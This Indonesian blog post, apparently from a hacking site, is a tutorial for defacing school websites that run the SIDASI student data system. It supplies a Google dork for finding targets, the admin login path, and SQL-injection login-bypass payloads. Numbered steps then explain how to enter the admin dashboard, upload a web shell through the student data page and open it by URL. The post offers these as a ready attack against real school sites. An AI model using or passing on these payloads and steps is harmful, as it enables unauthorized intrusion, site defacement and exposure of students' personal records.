Deface Metode Sistem Data Siswa (SIDASI) - Unauthenticated Bypass | Isekai Xploit


Halo gaes ketemu sama aku lagi Veno 

Kali ini aku mau ngasih tutorial deface metode Sidasi langsung ajah 

Bahan-Bahan:

Dork: site:sidasi.* inurl:sch.id

- Exploit/Admin Login : /?page=admin

- Shell Backdoor : Search Google 

- Payload :

Username : '=' 'or'

Password : '=' 'or'

Atau

Username : ' or 1=1 limit 1 -- -+

Password : ' or 1=1 limit 1 -- -+


1. kalian dorking dulu



2.Kalu sudah dapet web yang vuln kalian tambah in exploit site.sch.id/?page=admin


3.jika sudah kalian isi username sma pass: 
   ' or 1=1 limit 1 -- -+ contoh


4.Jika sudah kalian bakal masuk Dasboard admin/siswa contoh seperti ini


5.kalian pencet pojok 3 baris itu terus kalian pilih Data Siswa


6.jika sudah kalian up shell di situ jika sudah cara akses nya https://site.sch.id/assets/gambar/user/shell.php

Sekian dari saya terimakasih 


Posting Komentar (0)
Lebih baru Lebih lama

Terkini